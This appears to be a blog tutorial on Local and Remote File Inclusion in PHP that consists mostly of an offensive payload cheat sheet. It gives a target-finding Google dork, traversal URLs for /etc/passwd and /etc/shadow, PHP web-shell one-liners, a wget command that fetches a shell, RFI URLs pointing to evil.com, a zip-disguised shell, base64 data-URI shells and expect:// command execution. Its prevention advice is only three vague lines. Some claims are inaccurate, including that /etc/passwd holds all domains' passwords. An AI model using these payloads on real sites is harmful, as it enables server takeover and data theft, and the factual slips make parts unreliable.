LFI (Local File Inclusion) and RFI (Remote File Inclusion) – The Website Security Vulnerabilities
A File inclusion vulnerability is a type of vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time.
A file include vulnerability is distinct from a generic Directory Traversal Attack, in that directory traversal is a way of gaining unauthorized file system access, and a file inclusion vulnerability subverts how an application loads code for execution. Successful exploitation of a file include vulnerability will result in remote code execution on the web server that runs the affected web application.
Local File Inclusion :
Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included for execution. This issue can still lead to remote code execution by including a file that contains attacker-controlled data such as the web server’s access logs.
Example of LFI
Type of call:
require($file);
Exploit:
http://host/?file=/etc/passwd
Type of call:
require(“includes/”.$file);
Exploit:
http://host/?file=../../../../../etc/passwd
Tpye of calls:
require(“languages/”.$lang.”.php”);
require(“themes/”.$theme.”/config.php”);
Exploit:
http://host/?file=../../../../../etc/passwd%00
Type of call:
require(“languages/”.$_COOKIE[‘lang’].”.php”);
Exploit:
javascript:document.cookie = “lan=../../../../../etc/passwd%00”;
That is to include the file of the server in our browser
<?php include($_GET[”]) ?>
Google dork: inurl:.php?page=
Example : www.xyz.com/contacts.php?page=abc.php
www.xyz.com/abc.php?id=5
test : www.xyz.com/contacts.php?page=../xyz.php
Now in linux server there is etc/passwd file which contain username and password of all the domains hosted on the same server
1… www.abc.org/index.php?page=../../../../etc/passwd%00
2… www.abc.com/index.php?page=../../../../etc/passwd
proc/self/environ is the writable file by the end user
or var/log/httpd-access.log is also writable
usr/local/apache/conf/httpd.conf —-> gives the path of all logs file
<?php passthru($_GET[‘cmd’]) ?>
<?php system($_GET[‘cmd’]) ?>
<?php exec($_GET[‘cmd’]) ?>
wget http://xyz.com/abc.txt -O shell.php
How to Test Local File Inclusion
Since LFI occurs when paths passed to “include” statements are not properly sanitized, in a blackbox testing approach, we should look for scripts which take filenames as parameters.
Consider the following example:
http://vulnerable_host/preview.php?file=example.html
This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.
Typical proof-of-concept would be to load passwd file:
http://vulnerable_host/preview.php?file=../../../../etc/passwd
Remote File Inclusion:
Remote File Inclusion (RFI) occurs when the web application downloads and executes a remote file. These remote files are usually obtained in the form of an HTTP or FTP URI as a user-supplied parameter to the web application.
RFI – Remote file inclusion
If allow_url_include is On in php.ini, then we can inject a shell directly.
You only need to load by GET or POST directly to an URI with the shell (using a non PHP extension):
www.xyz.com/contacts.php?page=http://www.abc.com/shell.php
How To Test RFI
Since RFI occurs when paths passed to “include” statements are not properly sanitized, in a blackbox testing approach, we should look for scripts which take filenames as parameters. Consider the following PHP example:
$incfile = $_REQUEST["file"]; include($incfile.".php");
In this example the path is extracted from the HTTP request and no input validation is done (for example, by checking the input against a white list), so this snippet of code results vulnerable to this type of attack. Consider infact the following URL:
http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page
In this case the remote file is going to be included and any code contained in it is going to be run by the server.
Basic LFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd
Interesting files to check out :
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
Basic RFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
LFI / RFI Wrappers :
LFI Wrapper rot13 and base64 – php://filter case insensitive.
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
LFI Wrapper ZIP :
echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
http://example.com/index.php?page=zip://shell.jpg%23payload.php
RFI Wrapper DATA with “” payload :
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
RFI Wrapper EXPECT :
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
XSS via RFI/LFI with “” payload :
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
LFI to RCE via Upload :
http://example.com/index.php?page=path/to/uploaded/file.png
Miscellaneous PayLoads and Tricks
GET /page.php?path=../../etc/passwd
Forbidden 403 ?
Try One Of These:
(1)../../../etc/passwd%00
(2)….//….//….//etc/passwd
(3)%252e%252e%252fetc%252fpasswd
Prevention from LFI and RFI Attacks
- Use Vulnerability Scanners
- Use Web Application Firewall (WAF)
- Fix your code to secure.
References:
OSINT, Wikipedia, Github, Twitter